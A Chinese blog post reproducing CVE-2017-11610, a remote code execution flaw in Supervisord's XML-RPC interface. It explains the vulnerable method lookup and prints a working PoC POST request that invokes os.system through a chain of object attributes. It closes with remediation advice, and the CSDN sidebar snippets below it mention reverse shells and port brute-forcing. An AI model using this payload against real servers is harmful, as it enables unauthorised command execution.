Supervisord 远程代码执行漏洞(CVE-2017-11610)漏洞复现

最新推荐文章于 2024-08-18 00:00:00 发布
最新推荐文章于 2024-08-18 00:00:00 发布
阅读量3.9k 收藏 4
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37964989/article/details/89454076
版权

复现视频链接:https://www.ichunqiu.com/course/58895

如下内容为复现及笔记

Supervisord 远程代码执行漏洞(CVE-2017-11610)漏洞复现

0x01 漏洞信息

Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进程状态的功能,在进程异常退出时能够自动重启进程。

Supervisord在配置了Web接口后,服务器会启动一个XMLRPC服务器,端口号为9001,利用本漏洞,在获取接口访问权限后,远程攻击者可利用发送一段精心构造的请求,导致可在服务器执行任意代码。

 

0x02 漏洞影响版本

Supervisord 3.1.2 <= Version <= 3.3.2

 

0x03 已经修复的版本

Supervisord 3.3.3 、Supervisord 3.2.4 、Supervisord 3.1.4 、Supervisord 3.0.1

 

0x04 漏洞分析

Supervisord的控制实际上就是一个C/S以RPC协议的通信的过程,而RPC协议(远程过程调用协议),顾名思义就是客户端通过RPC协议可以在服务端执行某个函数,并得到返回结果。那么,如果客户端执行了服务端预料之外的函数(如os.system),就会导致漏洞的产生。

一个安全的RPC协议,会有一个函数名的映射,客户端只能调用在白名单之中的部分函数,并且这个“函数”只是真正函数的一个映射。

3.3.2版本中Supervisord是如何处理RPC调用如下:

代码逻辑如下:

  1. 将method用点号分割成数组path
  2. 遍历这个数组,每次获得一个name
  3. 如果name不以下划线开头,则获取ob对象的name属性,其作为新的ob对象
  4. 遍历完成后获得最终的ob对象,调用

实际上这个函数最后达成的效果就是:初始ob对象下的任意public方法,包括它的所有递归子对象的任意public方法,都可以被调用。

 

0x05 漏洞形成原因

ob对象即为self.rpcinterface,官方开发者可能认为可调用的方法只限制在这个对象内部,所以未做特别严格的白名单限制。导致调用存在的其他对象的方法,可以执行任意命令。

 

0x06 漏洞复现

1. 漏洞文件下载

 

2. 打开burpsuite工具,开启浏览器代理。

 

3. 访问目标地址

右击,选择Send to Repeater,将数据包发送至重放模块,点击Repeater查看本次需要修改的数据包。

 

 

4. 发包

发包执行成功

 

5. 使用POC查看命令是否执行

已经创建了hello文件,代码执行成功,

 

6. 漏洞复现完成

 

0x07 POC分析

漏洞利用模块查找方向:在非下划线开头的属性中可利用的模块。

 

漏洞发现者找到的self.rpcinterface.supervisor.supervisord.options.execve其实仍有缺陷,原因是Python的os.execve函数会使用新进程取代现有的进程,会导致Supervisord本身退出。

 

此实验中调用的对象方法为如下

supervisor.supervisord.options.warnings.linecache.os.system

 

POC代码如下:

 

POST /RPC2 HTTP/1.1

Host: localhost

Accept: */*

Accept-Language: en

User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 275

 

<?xml version="1.0"?>

<methodCall>

<methodName>supervisor.supervisord.options.warnings.linecache.os.system</methodName>

<params>

<param>

<string>touch /tmp/hello</string>

</param>

</params>

</methodCall>

 

此为实验中的POC文档

基于上述构造的数据包Poc,可更换一个思路,将命令执行的结果写入log文件中,再调用Supervisord自带的readLog方法读取log文件,最终将结果显示出来。Poc代码如下图

 

0x08 漏洞影响与修复

漏洞形成条件:

Supervisord版本在受影响的范围内

RPC端口可被访问

RPC无密码或密码脆弱

 

默认安装的Supervisord,是只监听unix套接字的,所以外部IP无法访问,而且supervisord.sock文件权限默认是0700,其他用户是无法访问。但是如果开放了RPC端口,并且使用了默认密码或未设置密码,也是可以通过该漏洞进行利用的。对于一切漏洞我们都要做到防范于未然。

 

修复漏洞:

升级Supervisord

端口访问控制

设置复杂RPC密码

OKAY_TC
关注
专栏目录
Supervisord远程命令执行漏洞(CVE-2017-11610)
谢公子的博客
09-20 3003
目录 Supervisor 漏洞复现 修复建议 Supervisor Supervisor是使用Python 开发的进程管理程序,一般使用命令行进行管理,当然也能通过web接口图形化管理服务。在配置了web接口后,服务器会启动一个XML RPC服务器,端口9001,默认配置接口是不需要密码访问的,管理员也可设置为密码访问。利用本漏洞,在获取该接口的访问权限后,远程攻击者可发送一段精心构...
Python-基于ssh秘钥supervisord的发布系统
08-10
标题中的“Python-基于ssh秘钥supervisord的发布系统”揭示了这是一个使用Python语言构建的自动化部署方案,它依赖于SSH密钥对进行安全的身份验证,并利用supervisord来管理和监控服务进程。在中小公司环境中,这样...
Supervisord 远程命令执行漏洞CVE-2017-11610
limb0的博客
07-05 4423
Supervisord 远程命令执行漏洞CVE-2017-11610) 一、漏洞介绍 Supervisord是一款用Python语言开发的管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 Supervisord曾曝出了一个需认证的远程命令执行漏洞CVE-2017-11610)。通过POST请求向Supervisord管理界面提交恶意数据,可以获取服务器操作权限,带来严重的安全风险。 利用条件: Supervisor版本在受影响范围内 Supervisor 9001管理端口可以被外网访问
中间件漏洞原理与复现大全【万字总结】
2301_80064376的博客
08-18 2663
中间件是位于应用程序与操作系统之间的软件,它提供了不同组件之间的通信、数据管理、应用服务等功能。中间件漏洞是指在中间件的设计、实现或配置中存在的安全问题,这些问题可能让攻击者有机会突破安全防护,获取不当的权限,或者进行其他不安全操作。
远程桌面漏洞poc_Supervisord 远程代码执行漏洞CVE201711610漏洞复现
weixin_39730263的博客
12-10 173
漏洞信息Supervisord是使用Python 开发的进程管理程序,Supervisord能够将命令行进程或服务变为后台运行的deamon(守护进程)。Supervisord拥有监控进程状态的功能,在进程异常退出时能够自动重启进程。Supervisord在配置了Web接口后,服务器会启动一个XMLRPC服务器,端口号为9001,利用本漏洞,在获取接口访问权限后,远程攻击者可利用发送一段...
docker-supervisord-monitor:Docker Supervisord 监视器
06-20
通过`docker-supervisord-monitor-master`这个项目,我们可以获取一个示例实现,它可能包含了设置和使用Docker Supervisord监视器所需的所有文件和脚本。这些文件可能包括配置文件、启动脚本、日志处理逻辑等,帮助...
docker-supervisord-example:Docker Supervisord 示例
07-05
Docker Supervisord 示例首先准备docker镜像 docker build -t test-supervisor .启动一个新容器只需带来一组新的守护进程 docker run -d -p 9001:9001 test-supervisor就是这样! 通过以下方式检查您的守护进程: ...
spring-boot-2.5.15.tar.gz
04-21
在 Linux 环境下,Spring Boot 应用可以通过守护进程(如 Systemd 或 Supervisord)管理,确保服务的稳定运行和故障恢复。此外,Spring Boot 还支持通过环境变量或配置文件进行外部化配置,这对于在多环境中部署应用...
spring-boot-1.3.6.RELEASE.tar.gz
04-21
在Linux环境中部署 SpringBoot 应用,可以利用 Linux 的服务管理工具(如 Systemd 或 Supervisord)来管理应用进程,确保应用的稳定运行。同时,利用 Linux 的防火墙规则和权限控制,可以进一步增强应用的安全性。 ...
入侵防御漏洞复现(三)
szdx1043的博客
01-19 481
反弹shell就是一种入侵行为,主要表现为本地主机主动连接远端的攻击者,这样远端攻击者会获得本地主机的执行环境,拥有所有权限,可以任意执行命令,如图2所示。
常见端口渗透总结
Alluresec的博客
11-20 4860
21端口 1. 爆破(hydra、msf中的ftp爆破模块) 2. ftp匿名访问:用户名:anonymous 密码:为空或者任意邮箱 3. 后门vsftpd :version2到2.3.4存在后门漏洞,攻击者可以通过该漏洞获取root权限。(https://www.freebuf.com/column/143480.html) 22端口 1. 爆破(hydra、msf中的ssh爆破模块)...
Vulhub Supervisord 远程命令执行漏洞复现
weixin_53696027的博客
06-07 301
Vulhub Supervisord 远程命令执行漏洞复现
Supervisord远程命令执行漏洞分析(CVE-2017-11610
zzkk_的博客
08-10 5611
Supervisord是一款由Python语言开发,用于管理后台应用(服务)的工具,方便运维人员使用图形化界面进行管理。 近期,Supervisord曝出了一个需认证的远程命令执行漏洞CVE-2017-11610),通过POST请求Supervisord管理界面恶意数据,可以获取服务器操作权限,存在严重的安全风险。 Supervisor介绍 Supervisor 是基于 Pyt
python supervisord 远程命令执行漏洞CVE-2017-11610
whatday的专栏
06-27 764
Supervisord Supervisord是一款Python开发,用于管理后台应用(服务)的工具,其角色类似于Linux自带的Systemd。 我觉得它相比Systemd有几个特点: 配置比较简单 一个简单的第三方应用,与系统没有耦合 提供HTTP API,支持远程操作 所以,我之前把他用来跑一些Web应用。 Supervisord的架构分为Server和Client,Server以一个服务的形式,跑在系统后台,而Client是一个命令行工具,其实就是根据用户的要求,调用Server提供的A
supervisord部署redis-exporter
最新发布
09-12
`supervisord` 是一个进程管理工具,它可以用来监控和控制多个后台进程。而 `redis-exporter` 是一种用于收集和导出 Redis 服务状态信息的监控工具,通常用于 Prometheus 这类监控系统。使用 `supervisord` 来部署 `redis-exporter` 的步骤大致如下: 1. 首先确保你的系统中已经安装了 `supervisord`,如果没有安装,可以通过包管理器进行安装,例如在 Ubuntu 上可以使用 `apt-get install supervisor`。 2. 下载 `redis-exporter` 的最新版本,可以通过直接下载预编译的二进制文件,也可以通过包管理器安装,或者使用源码编译安装。 3. 将下载的 `redis-exporter` 程序放置到适当的位置,并赋予它可执行权限。例如,如果你下载的是二进制文件,可以使用 `chmod +x redis_exporter`。 4. 创建一个配置文件,通常文件名为 `redis_exporter.ini`,配置文件内容会包含 `redis-exporter` 的启动命令和配置参数。这个配置文件通常放在 `/etc/supervisor/conf.d/` 目录下。 例如: ``` [program:redis_exporter] command=/path/to/redis_exporter --redis.addr 127.0.0.1:6379 autostart=true autorestart=true stderr_logfile=/var/log/redis_exporter.err.log stdout_logfile=/var/log/redis_exporter.out.log ``` 在这个配置中,`command` 指定了 `redis_exporter` 的启动命令和必要的参数,`autostart` 和 `autorestart` 控制进程是否随 `supervisord` 启动和是否自动重启,`stderr_logfile` 和 `stdout_logfile` 指定了标准错误和标准输出日志文件的存放位置。 5. 更新 `supervisord` 配置,让它知道有新的程序配置需要加载。可以通过运行 `supervisorctl reread` 和 `supervisorctl update` 来完成这个操作。 6. 最后,使用 `supervisorctl start redis_exporter` 命令启动 `redis-exporter` 进程。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值